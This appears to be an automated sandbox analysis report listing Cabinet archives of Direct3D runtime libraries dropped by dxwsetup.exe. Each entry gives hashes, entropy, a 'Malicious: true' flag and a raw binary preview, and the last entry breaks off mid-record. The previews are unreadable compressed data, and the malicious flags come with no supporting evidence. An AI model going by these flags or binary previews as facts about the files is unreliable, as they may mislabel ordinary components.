                                                                                              Preview:MSCF....!.......D................"..........!....#..............G...P.........i:k{..d3dx10_41.dll.h-..P.....i:k{..D3DCompiler_41.dll.......#...p:.r..d3dx10_41_x86.cat.I...a4#...p:.r..d3dx10_41_x86.inf.i....7#...p:.r..d3dx10_41_x86_xp.inf.c....:#...p:.r..Mar2009_d3dx10_41_x86.inf.Nn.>.0..CK.wT.I..{.G.C.QQ.#(I.T`..Q.........0.b..5`Xs..bD.@..f1.9..x....Yw..{...s..U...[.kjj.....h3...TV2.nFx92?~=....m.l.[n.[..(81)]..R&..Sd...J.,F!Se..Re..A..e..~}..b.e[.fd.np.+..[......R;.z.....v....N.~...ibx.h.S.....W...7..-.a.8...`...$u..A.0K....j1..g..A.^k1...Pj.]bm.ym..~t...+d..`*..LG}..X...#.J.....;'e.Z.-.2..m.0....[W..#......j.05.Z.R.!..:.jd..e.........O..7:...\....k..bY...s4W).. ..%.......:g............p..Z...... ..<5.2..].... ..X.,..!~.0...v..k.c.1.2..V.10.L.#.R.x.=.S.9.....27.S@.....d.* .p.l.d......}.\...;.e./.0 ...&.~...8.\...:.L;.'....R..."`;p.....>...........BhW6.I&..D.!.3`...M...>u.....S.A......E@...0.P..@8....v.9....X@..."e....'..`c...(...^..R.'p...4....{ ...f...2....h
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 722496 bytes, 5 files, at 0x44 "d3dx9_42.dll" "d3dx9_42_x86.cat", flags 0x4, ID 7080, number 1, extra bytes 20 in head, 59 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):731664
                                                                                              Entropy (8bit):7.999475174279291
                                                                                              Encrypted:true
                                                                                              SSDEEP:12288:IDTg2rIyRKFAtmsFp1UChyax+LFl9NiHEpMH5Vfe8PIqEqnyA6F56J2:M02fKYVFvhKLFl9NikiH5V28PXyA6GJ2
                                                                                              MD5:9BC8213933598D050827D20A4573486C
                                                                                              SHA1:E6F9BA62756A00C53746419DEA221881AEB336CF
                                                                                              SHA-256:9C96B6FC4DF5C0EFCA9F0D653976772B2B964243214F99066E4CA4AA6DF791DD
                                                                                              SHA-512:A1920D042963CDDA41DF44044DE5B94B4CEE6EFA102F633214E384918D93D2D6A31EB388BDBD00C7E9C199281E3B71CAA5242E9A42E7F0BE27EDF90A3CF6890C
                                                                                              Malicious:true
                                                                                              Preview:MSCF....@.......D...........................@....#..............;...X.........$;....d3dx9_42.dll.....X.....$;...d3dx9_42_x86.cat...........$;...d3dx9_42_x86.inf.,.........$;...d3dx9_42_x86_xp.inf.\.........$;...AUG2009_d3dx9_42_x86.inf.....::..[.... .......5!.P..wO.n..pOc....7...l.c.n..slmk]....]...B..W..D..UJ...P........C.......l8..y^.S.N.I..7%.....].n...d...>.#....zT{6+..X.UB. A*A......u7{0...n. ....d..R....=...D...F.......n..n..~U.]..U.EX, .......A^;...(...<.@#0/..O.!...i.#.C....D...D.cwC.v.y.<+.*..*..g.l....f.k...W...[..I&...M..W.&Z..^..MB...:.LyQv.l.U.=Y..%....8Ls.......-..".U.....s.f.YVvX...-..8T..m...=..9.CN!89....f.2.G.....:s.G...>.......c^.Z..=h.l..Q..w..yc.\i.Z.^...$cw.T.".d`.jhL;.ZqB.L.{...Z....h{=s.....a.4.1../..`....|;I...;...$.m!l'.g..pa.).b0..:.tT...T..{..<..T.....z.....!....,..|.@.../..A.....q.......@.....................|..5...[..p.6....FE.../.609$.....+.Q.f.N3.....L; ..6./.j.4.a*.E2....(G0,...x..5...IBS.._......9.....%0.....
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 186171 bytes, 5 files, at 0x44 "d3dx10_42.dll" "d3dx10_42_x86.cat", flags 0x4, ID 7280, number 1, extra bytes 20 in head, 15 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):195339
                                                                                              Entropy (8bit):7.996178589789764
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:/hxMUzbnbaWbX0JkFvs5aQnkW6sJ/Fw395/lfLxBQLgGlekmQI84HAGujR7j:5CEbiqvs5aQnkW6A/8jlzxBw0/Erd1X
                                                                                              MD5:F264AF5A36B889B4F17EB4D4F9680B4F
                                                                                              SHA1:1DF087EA99D321EC96D0D2F1C66BEE94883D6F08
                                                                                              SHA-256:BB46189EB8CB7769EB7BE00CFBC35902072FA9408313EF53F423E5AE5C728F61
                                                                                              SHA-512:73AE1CF3CAFBA148F4E5B4D8AC12A7AA41F6ECAC86C139C6A7714F90F3DC61C444DC152A3AD3C2CA800C1A1F4955A2B508735F8490666B57D1420FB7A7BFC269
                                                                                              Malicious:true
                                                                                              Preview:MSCF....;.......D...............p...........;....#..................P.........$;....d3dx10_42.dll.....P.....$;...d3dx10_42_x86.cat...........$;...d3dx10_42_x86.inf.(.........$;...d3dx10_42_x86_xp.inf.c.........$;...AUG2009_d3dx10_42_x86.inf.|..f.0..CK..T.I....8*....e0.JVT`..Q......A..a@..i.k..........b.bN......fE.]...y...s._W..~.......9.6.0:../....^.._..F{.3......7.NHL.....T......Z.....Sd.)2W. Y.2Na....^.lk....+......V.J...j.W.vI.Xj.V....Y..^$....&.&....9..azKt..6.*...2..e..).,..6...0,......Z.a...R...k........(..V.E.....2..C....p>r..Y.].sR&....)....i.0.....W..#(.....j.p5.ZvR.!..:.jd..e............7:(..\....kZ..b^...s4W).. L.%......:g......./..5.......eW).....t.2..].... ..X.,.. ~80...v..k.#.1.2.....0..PF.....z.]......\.\.N.E.J`6....p.....@_..;...p.8........x.....y.6.(p.x..XJ..@O........E.v.0p...m4.8.,.6.%...P.lh.. ...B.g..0.....>v.....S.A......E@...0.P..@8....v.9..h....xc*e....'..`..._...........M.lg..P..-.!......L...@$0.........j5..m.{ .H.f.[...C@
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 99084 bytes, 5 files, at 0x44 "d3dx11_42.dll" "d3dx11_42_x86.cat", flags 0x4, ID 7285, number 1, extra bytes 20 in head, 8 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):108252
                                                                                              Entropy (8bit):7.991332626956763
                                                                                              Encrypted:true
                                                                                              SSDEEP:1536:MI9cI4N24813fwIsfQqzjoroJ1OL79D+0sFGmNjFRchFxLvk5yswFa8D+0qlt6s1:Pah8Vo/1uLJoGmZEFxLvcwM8DZcZxb
                                                                                              MD5:DD47F1E6DC19405F467DD41924267AD0
                                                                                              SHA1:85636EE0C4AF61C44D0B4634D8A25476CF203AE9
                                                                                              SHA-256:39FF69BA9161D376C035D31023D2FDEECB9148A2439ABE3AFD8F608F7E05E09B
                                                                                              SHA-512:F77C4CEF5CB7E927948F75C23A190E73D6C75B4F55915859046533A10AA3C5ABAC77D8BEF71A79368C499C85009213E542094B85B94B69E62AA66B60616777C3
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D...............u................#..................P.........$;....d3dx11_42.dll.....P.....$;...d3dx11_42_x86.cat..........$;...d3dx11_42_x86.inf.(........$;...d3dx11_42_x86_xp.inf.c.........$;...AUG2009_d3dx11_42_x86.inf.ix..@ ..CK.[.X.G.....<..: .QQ.9...S@..A.......p..D._M<.A7&F.q.f]c..xD..Wc.....F7..H..b.._.]=T.tbo.......|O}..[U_.U]o.L......(%..V..Nq.(.....=v........R..3.K.......2c....Zm,..+k.%.....2k.e........s3Xx...C....~..P.X..o..~..[*....../A.?...*\Rl.QRX.g.sz<E....g..s..[/s.(5..T..>/.(.9F&;.c|..).k*....6y.7+P..d...U.J.H7(.x.E.B}.1`..Z. .C....lTP...C7....._^h7F..t....T[.V.r.J.....&?F...Pd.6#..H|....).<.....U...g...5..5..RjE.=.sc:...x1..[..w..p...8*."..Y8.....AV...E".A..p...%d."..5d.!..l4..d}..#.A...#;.l.....!.....Xd...!3"...G...d_"...^do![.l..i.& ..,...d}.9#S.....IA.C......E.6..![...dS..#+@6..@.....m..:......v!{..Zd. [.l&..-.....9..C9...}.x..Y9=.F...k.Z^.^...!{...........R...d.._...~2z_O.mXG.._...XkYEI.....^iA.p.....=...wa;...N.6.2
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 3313780 bytes, 5 files, at 0x44 "d3dcsx_42.dll" "d3dcsx_42_x86.cat", flags 0x4, ID 7865, number 1, extra bytes 20 in head, 169 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):3322948
                                                                                              Entropy (8bit):7.9992960947448655
                                                                                              Encrypted:true
                                                                                              SSDEEP:98304:hd4ZyuDJf9oMm+hWh3ZHD8VZQCbsY/ny66RHX:BuD8b2WUZQCg+ny/
                                                                                              MD5:73BA11CE0E936726FC9FCB882F8B91EA
                                                                                              SHA1:4A4BABE3AC751E60AE6B5B0D69C93FA53D7FCD21
                                                                                              SHA-256:A9A704B73531D6BF59A421AB5C046C19A16D2B0B07F09816DBE9DA4550A24B17
                                                                                              SHA-512:9A198EB93D5623651D2981A277EAB4C345C08161254D0127D90C97344450AC1A7FD5C8AC840048A43A347E3296B286B646EA0FBA88F0C7BCE1CEED1484112D56
                                                                                              Malicious:true
                                                                                              Preview:MSCF....t.2.....D...........................t.2..#..................`.S.......$;....d3dcsx_42.dll.....`.S...$;...d3dcsx_42_x86.cat.......T...$;...d3dcsx_42_x86.inf.(.....T...$;...d3dcsx_42_x86_xp.inf.c.....T...$;...AUG2009_d3dcsx_42_x86.inf.?b5B.]..CK.w\T..7.Mnb.QA..E..Q .B...AD..X.q.JS.H..&&.....HS... .a.n.((..J/....!R.a.y..g0......<....9.}.^{.....do3.sb........PL....V......_.|)V..w.a.d.>.#~k.......Z.t.......e.o...#.k.,..x.8.(/\.......5.4....?.Z.B;.9;t/....@..^&..C...m.........f.....#N..._e.c(&f....].-|.....>X..?>..S.#&..!..v.BLl1*b.^.&....},..r|4...}Dy...@....\,.^..R....#v....Gl..j%v..w.k...^.....(...........l..m..,............k..J ..?.o.FL.{e........Cj.{..=.-&.oe_?_'8's....~..k.o.}]<}.a.^jnb.....j...........U..3p.....]pl.C..)8.....#V.G..Yp\.#....0.C..q8...#6.G+..p..:...)....#..G8...H.#..z8..x..8._.;Rp......8.....A8hp..#..Sp\.#..Ox....8..0.c3.RpLk.<.x..-8R.#....q..x..~.?}]Jz.bU8L...........j..z.K...6.{Cl..6.sVsV.Z.....sGUrE;..'..a.#>.._Q.U}....sb.\....}-A.
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 894638 bytes, 5 files, at 0x44 "D3DCompiler_42.dll" "D3DCompiler_42_x86.cat", flags 0x4, ID 10010, number 1, extra bytes 20 in head, 61 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):903806
                                                                                              Entropy (8bit):7.998441664012848
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:kWl8lkb28nNHiYNk9tb59zmj000KFiBudeBsbgy:No8NHi7/pAJioEy
                                                                                              MD5:87BDAE64FD47A75F867A290EC7B8A4B7
                                                                                              SHA1:DD9E69E1815E8BC161E8EB89A0F2A296074BB95D
                                                                                              SHA-256:6BD32337826F5A5141FC06391919A249E984150905C2546DC8BFC33D41A24E82
                                                                                              SHA-512:C8F7A490722741DF4E03823880C6D623FF16AB648A40C1B1C8F7BF26C92499EB34C4596BF239337CD23A57974757958AD9A30D42A4141DC0E7522F998ED3893A
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................'...............#..............=...X!........$;....D3DCompiler_42.dll.....X!....$;...D3DCompiler_42_x86.cat.!....;....$;...D3DCompiler_42_x86.inf.<....>....$;...D3DCompiler_42_x86_xp.inf.....4A....$;...AUG2009_D3DCompiler_42_x86.inf. ..$..CK.Zyx...?..P....%i..@.mh...,e.Y...5...&.!K).Pe.*........;**..zq.j...* ./..s./dR...=.}.....y.o....93I;.+X.c,.....-Ln..o.)z.<.m..F..e...s.|a....!w@...A=..jj(.T}A.j.j@.j..=...c...=...m.....m...m...6.h.o...[....m.h.k+...s<./F.R.'.<..7Vs...f*.......]..M...O6.NVD....o.{v..*.-.ub..........5..q."....V6..m..B._l..w...mI....j.S...mdlG.c..0.*U.p.. ..?.;"ZS..}?b\|...=.<...q...Wb.s..9..:.VG(......ExM.w.Mp.4.N..g...Vjg..7./\nG....Wyn..l.."..;..6...v....S....b1.Y...^..Sk..P....vRl.x..!.u..)Z(B.u.gQL.(...R0..../)>.x...<..d.3(..h.h.XE...."......}T.....(.S<O.(....(n......|......b&.....E.y....),.m{ml7.7..S.G.....[(.S..XE.L..Hc.L...6.w(vR|C...."......y.........M....o..-.....[.h.b....V4.I9...D.As..]h....).]
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 762076 bytes, 5 files, at 0x44 "d3dx9_43.dll" "d3dx9_43_x86.cat", flags 0x4, ID 7093, number 1, extra bytes 20 in head, 62 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):771244
                                                                                              Entropy (8bit):7.999380380890997
                                                                                              Encrypted:true
                                                                                              SSDEEP:12288:E0b5pTUIVIRxV+yb+HJFnXQRGr85UpzQ3VztxmHN8DMFy0BJ1lSIug3SqHAlzJYf:l51NVO+XVLs3VztQHmYjBJb931I1NYI0
                                                                                              MD5:BF124B64FC3774F61D30DE0A405F0C6C
                                                                                              SHA1:2F8A8BABFA4E51555FCF125E8373D9C5F7F7434A
                                                                                              SHA-256:457C5CE48EAA0FE551B46DFFC1E4DCA985D261686D8D4E6BCED533EE1F682FCE
                                                                                              SHA-512:935922CE74BD399E8358693562F86C9B4B6308A6E33586A5DD61924F8B6B2CFD6CB2E472FD082B9EA32C0ABB9A799A0BA9103B4C316342F8072A7A3782C2116C
                                                                                              Malicious:true
                                                                                              Preview:MSCF...........D...............................#..............>...X}.........<!]..d3dx9_43.dll.....X}.....<C'..d3dx9_43_x86.cat...........<.&..d3dx9_43_x86.inf.,.........<.&..d3dx9_43_x86_xp.inf.\..........<.&..JUN2010_d3dx9_43_x86.inf.[.'.":..[.... .......5!.P..wOnf..O..........9vm..o..f.6.....+I).H]..t.....T...v.!..M.......>>.{..._..t....g...:..jh.N....K...vJ.r.. ....;J.zq.....*....H....'....d.=...{O.4.xIBC..L7..2....... ..E5`5`........<s...9..(.b3. .."t....M\.;...0......*...H....K.5$...L.Ha....%..e..V........{.t....#3kk.sR6.....I.u.Em....b.Dl'.E.[.D.N....m53%...'.m;.>..yf.6..pN..N.y...-.5Y...f.......-.B#.......;.D]......G.8.5...*G.......x..}...!.GwT.......WwKuT...Y.l[f..}ji...{.h{...x.u.....>..1....k..v.D."W..ZA..<...7=c2QN.Y.......v..k&aHudg.W...`HbV{.Q..CJk..nLpw..#.&5.%S...G.&.`....]...EpFY...(....P\..+/`..&..ap....S....BR..'....s..c........p..B..j*....c..D....mU.x....N.r..QfEz`...}.._...........8..$..........!.G...i.@..P...."c..d.L00...QX.B0.
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 191323 bytes, 5 files, at 0x44 "d3dx10_43.dll" "d3dx10_43_x86.cat", flags 0x4, ID 7293, number 1, extra bytes 20 in head, 15 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):200491
                                                                                              Entropy (8bit):7.9966634458730566
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:kD2Fju8h1xkWCD/5e8U2LK1aQAMxVz2aoOxoY4+ApyP0EwMGvFas+8QJgdBvCD7D:kwbCleyYagxVCaoV+ApcnG9aKQJaw/
                                                                                              MD5:591A61BD06C73C70F93DAC5AF2D8E924
                                                                                              SHA1:C9D36AC5E2ACAC31A7413D22ED1C09C71CC96FFB
                                                                                              SHA-256:F0BC06CEB484D97CF01526F9223DF7B4357D166C4391869F2E7D514DC1FE769B
                                                                                              SHA-512:3E2E3318A700A6ED82A21018403CA99728C8A56B7DF81F99A5D705B586CEE1141586DBF19A01EF1F1A72DDC8F45DDB51BA5769AE4634B02233EF1AC4E0FBA5D4
                                                                                              Malicious:true
                                                                                              Preview:MSCF....[.......D...............}...........[....#..................`/.........<!]..d3dx10_43.dll.....`/.....<B'..d3dx10_43_x86.cat......I.....<.&..d3dx10_43_x86.inf.(....L.....<.&..d3dx10_43_x86_xp.inf.c....O.....<.&..JUN2010_d3dx10_43_x86.inf..=.h`1..CK..T.I....8*....ePQP....SENJ..1 q....a@EE.a]E.5....F.t...s.v.iM._W7+..:..........oW.*NMM....e...1.*+.f.#..2.....7.S..V..|..O.yX.2]..Q'jbReq1*.Z+.U.4.*.R%........6....<./...gU.g.)...u.y....dj.....UJ'j....[/.../E....e\.._...^..Gb..}.*...37..2L..a..q...../.|...z.#e$.ZU7...vnkmh?W....-..L^...h.0.....>.Y._....f.......vpO#.1..6_U.o.......h.#.`.d....j.F.0.6.1..>.H...`'J..A.%6.tM.\.:<.......F...!.K......?t.:...../...2..=...2....&e^...I.M`........H."........@&0.X...%.1..p.h3L(..V....K...5....X........x.]..@}.F.8.......%.T`.....=...!...x`40...v.g...k..6...@. .......wh.@ .......F..+..#`.....p_-e*.3...^`+....&..@.......o....:.... ....c.&p.8.....6.K..@......e~....H.w..R..........`.0.X....G..`)k.8...-0.....n.....R......f..
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 103485 bytes, 5 files, at 0x44 "d3dx11_43.dll" "d3dx11_43_x86.cat", flags 0x4, ID 7298, number 1, extra bytes 20 in head, 8 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):112653
                                                                                              Entropy (8bit):7.991810619702373
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:tXMVzDTlrM28bEHSqgik2ono4DQQ/7cuBFbb9aD4:tXMxNjG4gikye5FBtBr
                                                                                              MD5:061BBA3836B3FFCBB01B150467BBE951
                                                                                              SHA1:00D8FBCD4068B3199D3D393BB4B86BF82985480D
                                                                                              SHA-256:B80DB68CD82CAF8BEDAEE62808171B20C546A76499C3AD53014E3BD2FBD2918D
                                                                                              SHA-512:AEC8327E1CCC0B33B3E32D66A5EE25C4B70A227B708D10F61EBAD2D998F3BE68145FA85C50BAA16A21EE766B336B1432FBEC02C75D698793092015C832B6FC26
                                                                                              Malicious:true
                                                                                              Preview:MSCF....=.......D...........................=....#..................`..........<!]..d3dx11_43.dll.....`......<B'..d3dx11_43_x86.cat............<.&..d3dx11_43_x86.inf.(..........<.&..d3dx11_43_x86_xp.inf.c..........<.&..JUN2010_d3dx11_43_x86.inf.kK.*. ..CK.|.\.U........:(.....;.........\.".+...K......a....f*.eZVZf../M.2M1M35.bj..%~gf.,gv.........~>..<..{.y.93.{fv.c..(%EQ*d......?...?...z.i.^u=.g.b..>.%....*..*s...\Qa..'[.U5....c|Z...Zl.....m....\u....s....|.....2...s..*.rE^ Wn..J..j|.$...2....mO.ul.E.V..c.7R...E..+t...2p....@>.V`..<.).Rp..*_UrI{h.../Z..0|...sQJ*ACQ..J....*.F%..W.T..*....E.{P.....1..A..U.6...2.J..|^a|.....Zl....|.>.tT.P.x..=C.......V..b'^..*K....}.s...op.....?..'=...2T>.l).....l.2Od?E*.S.....V .GV.l<.Q. .Bv.]7......d...MB..,..72Od..WR...D.6.M.V!{...d%..B...@.L..j..:..(.=.G....b..BV.l...d....B........p%u....F.....l.!.G..l.2.,.. d...|..Qm.v....G..L...).C..c.#.Ih...................ee.......VPL....8X...H1.=A1...q....2.E!.l..M.E..jTw.z.y..*d....m...Y.
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 756228 bytes, 5 files, at 0x44 "d3dcsx_43.dll" "d3dcsx_43_x86.cat", flags 0x4, ID 7878, number 1, extra bytes 20 in head, 58 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):765396
                                                                                              Entropy (8bit):7.996955154936438
                                                                                              Encrypted:true
                                                                                              SSDEEP:12288:C8Dx0/99rEneJVyrxcsaWmeUEEBTJNCK/FcZZXlewc3/2tqCyrIUl3z82ItDwh2Z:XDO19AVrRfEHNZWZrs3+ICyco3MDISTT
                                                                                              MD5:E34C0CF1BD5A68C80BDC709A452EB322
                                                                                              SHA1:4DD4553EC7E2E42D51A716B1F4CB58588BCAA164
                                                                                              SHA-256:799B517227812252481C9C9B22CF16FF185FFC20B9273612C8A37153B53AAD93
                                                                                              SHA-512:3488A52F6FD3681B10624546B923368245F969330D4909E91C5B58F159CD24B258A8A2274D62243CA5CA9F1FB40F9F248B3BD92283F775DD24BAF68ECC5FD03D
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................................#..............:...`..........<!]..d3dcsx_43.dll.....`......<B'..d3dcsx_43_x86.cat...........<.&..d3dcsx_43_x86.inf.(..........<.&..d3dcsx_43_x86_xp.inf.c..........<.&..JUN2010_d3dcsx_43_x86.inf.UR.....CK.{t.e.....6.I.Zp....a/.v.U#.Hi.%..V.f......&[(. .R..l.Tm4VA..."..-JA.Z.@....J.....x.....$.|..y|....fv7..._..wf.-.N.QJ..z.......Q.....<aG....=5.K...,......^.....]]....`..`GWp.9........S..c...>9kG.P.M...\......^O..[:.7.5..s.....|.........#.|.....TS.Xu0.....W.5.J...G....{.....*8.E...J.:B..l...9...........E..Q..'8j.....u.a.V.T.$Y.....O.V*..?.HW.._..........rMiA..g.;r....M'.Iy>9Z...!Y.sF.'......<.}..<......X....o;5..T.,..g.3|.....\....QOK.#5 .Vj....3."R'J...z.Q......n..R}R.K.J.:Ej..*.uHj..CR;.6K...>...QWK.Im..U.A.g...'.N..J.,..j.:Kj.....R.H]..Nj.TV~6#.Tj.T.T...R.R..;j...R.H.H....|.5..'.d...z.kU.eR....z..d....*...PO.6..J....ZT...t8T..d...D8.ji2.Lf$..lGw....7^s............k.j.q/...\.f..}ek'....
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 925511 bytes, 5 files, at 0x44 "D3DCompiler_43.dll" "D3DCompiler_43_x86.cat", flags 0x4, ID 10023, number 1, extra bytes 20 in head, 65 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):934679
                                                                                              Entropy (8bit):7.998315243107519
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:pOWjUzqd7URYQio4yGDUATxoWDYicd3qRbmXHphTheb:ptx6RYQiL1DUA7EicSbUJhIb
                                                                                              MD5:E7DFA140CB0AE502048ECDF1E42360E6
                                                                                              SHA1:4DB08318F78F076FCC6FF29737B3D6D676F59C54
                                                                                              SHA-256:293CED557AD732ABD2737333DF39B08216F31601D7AB65B743FE51B4EFB8B6F0
                                                                                              SHA-512:39B69A5CC4A50DE72D031C41879ED7644B577A9E3E3B44BFECC61D5312C7C32C964DC2CD37DB711F7E486F444CA77FE732C642F3E494E6DA1BC1CF774D9EF75C
                                                                                              Malicious:true
                                                                                              Preview:MSCF....G.......D...............''..........G....#..............A...h# ........<!]..D3DCompiler_43.dll.....h# ....<B'..D3DCompiler_43_x86.cat.!....= ....<.&..D3DCompiler_43_x86.inf.<....A ....<.&..D3DCompiler_43_x86_xp.inf.....QC ....<.&..JUN2010_D3DCompiler_43_x86.inf.W...P!..CK.[{|[.}?.J..'r.$...k.I........;/.`HZBG.e..V.....C....e@..i.%.@C.:.e..2F..t..A...n.i..e..F...s.W..,.l.g...7.{~.....y.k....`...06..1._.l...af..3..S^.<&my.r[. .h.p_.;....P8...J$.R.!...@.:g.Z.......;...s.}.m.....)...U.....4.H..m....u.]s......A.....d.]..."YYK.....&WN..2v..._........*.?vq/3fc.@^.XSD.zD.:.K.a.Mt..........r...LT...C1.+........s..(d.,G.O.l..:y\.X..S.bD.. /..5S.2.v..1/...<r_G.b6^..3....^.@.._5.f.vgD..I..gznTl...[w......p.y[....u...B...v..........&.%..].u.:....}...{..".)..........;......*B1.Jx.b9I8Ax.p.p.PF...........F.".".....|.^%.Hx....;.#.{.......1..B7a.a....$T.J.3.V....=..7./......%<F8B...v.....C.N.$<Hy|.p....Y..W.'.....\i..J(&(.%.....0.S.=y_..........F..[Jp.1......(-.....
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1241539 bytes, 4 files, at 0x44 +A "d3dx9_24_x64.cat" +A "d3dx9_24.dll", flags 0x4, ID 4731, number 1, extra bytes 20 in head, 111 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1250707
                                                                                              Entropy (8bit):7.999567218170613
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:bsacaEhnsKcwXWOBfH7OhvlY2HIbbK09zRy2/TnN75EEvIOiOhpbF:xuzcwXW6YlFIbtN7MOiOh
                                                                                              MD5:DCA673A8F9F834F9370862D1C97FD9E7
                                                                                              SHA1:1A0CF0FDDA2C9E8ABDF5CC19FCDBEAF1BC1639E7
                                                                                              SHA-256:BE3DE63F136A2B41D3229E477CE2CD7F67DED031B4B370E640C39B80368238CF
                                                                                              SHA-512:255270BDBC1DCD6A3213D8F0DA2E48C6445B0141C5148EDD1DABC9CA4643667651694B68013412A4F2EC90CCD60A757F64A9A76E2576C4FCB056DDE726A6F67B
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D...............{................#..............o...7.........E2.. .d3dx9_24_x64.cat...6.7.....E2.. .d3dx9_24.dll......26...E2h. .infinst.exe.......7...92.. .d3dx9_24_x64.inf. ..nl9..[.... Wnq..@..$Q.P...>.$..B;.*.......R...te.....K+.E...E%.....Zk...AQ.....8....C........h...:'iI....5B.'.:}..Y{-.H.6.*.......b...$.P........'..*..i.....H..i"8..$..........!"..."I.n6.Me6...Z..F)..P.^P..P.W.~........&V...q..~..'.AE.!...."...(.$.eP.HD..5................k..Ky%.>.kS....l.)...uN.-.$S.."......I@...bh./V.).A.....+.].....'.]....q.>.Uo...."..g...U.(...qXq.pH.L... ...."V.....Q.R....'>\...9.s............8....]gON..`a..S..u.O%.e.....U...H..CCr`.n...7=}...|z..3...k......CH.^.#..../.....c.rM_.`............"...y#.....YW...<..%CZ...=.c....ni......8.^....G.V.J8..". .?@.+R..'...m.7...JX...q....p.......:....zs..@.....9..w.Q......3+.......wt...G.\..V..8......B.=+.,#..l.Z..R.....F.=8.....#p..'......>.q.h...E.ME.^ig......./......".GB.O..Q...i.-r. .......
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1341394 bytes, 5 files, at 0x44 +A "d3dx9_25_x64.cat" +A "d3dx9_25.dll", flags 0x4, ID 6661, number 1, extra bytes 20 in head, 119 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1350562
                                                                                              Entropy (8bit):7.999714569554039
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:qc+wdspnWpjnrcf+FH+guUawET50xShS+KMMMBNNxjUBH/0ghOw5b:r+AspngnK1TDhS+jMMBN3jeHLhOE
                                                                                              MD5:E961A77647E7FC2597A68FF572F730E1
                                                                                              SHA1:976D1CDE1EC28A4992E1CBC345637447115F14C8
                                                                                              SHA-256:A239E99D02FBFC9D30D5B705AA743FC070386FAEA1A66B3D67099AB446568A12
                                                                                              SHA-512:CF72AE18E99942D959BCE58678F544A10C98802D919ADC30737389D6CC0D492F8D7902E0E2CD04501FE6429B96C782649658D2D35C879A202C23E88570A15B94
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....w......D............................w...#..............w...7.........r2. .d3dx9_25_x64.cat..V:.7.....r2|. .d3dx9_25.dll......t:...r2X. .infinst.exe.&....V;...r2.. .apr2005_d3dx9_25_x64.inf......Y;...r2-. .d3dx9_25_x64.inf..q...9..[.... .cm......R.P...OB.."..AI5.]..."..UL.F.$.T.S*..iR..rJA.O9N/..jGJ.........\..=.....z.....5L..9.SA/&..,;e.l.@...C..Y..z...a}M...d..qh...:.'..@...o............T.{7..s.d1".........Y.*./.z..7(....N.k...,3...).h.>X..X...l.....A\p[....`y.......G..^d.c".j..k.....M...].ef.@..c...-.!.%O3.<G..B.y..A,.B..G%0..K...J...XX.Ig.|=.. ....#.t..>.#....S...^@..@.^m..@.l.....zI...y...L.Q.C.....x.[W..y..Z...o^.].G...G..4.q........o.xQA.....O...&B..s!......=Ovrtq.X.-}.u,k..:ju&m,$.5.V.T.z%......\.G.Dx...~-W.......... X.>.L...I.y?.f.1....4..J.b....%.e.t..U....o(..A...o.?.X..._?......).$.k.#..5o.>..&.0..a....8k....&E......$...Y..q.Y.....O...?...}}=.]'7.Knw....@.n.../.....".....RB.tg.._..Se'2.B)........6..p.K=......fz...z......I..y..uA
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1330042 bytes, 5 files, at 0x44 +A "d3dx9_26_x64.cat" +A "d3dx9_26.dll", flags 0x4, ID 6675, number 1, extra bytes 20 in head, 118 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1339234
                                                                                              Entropy (8bit):7.999619123900207
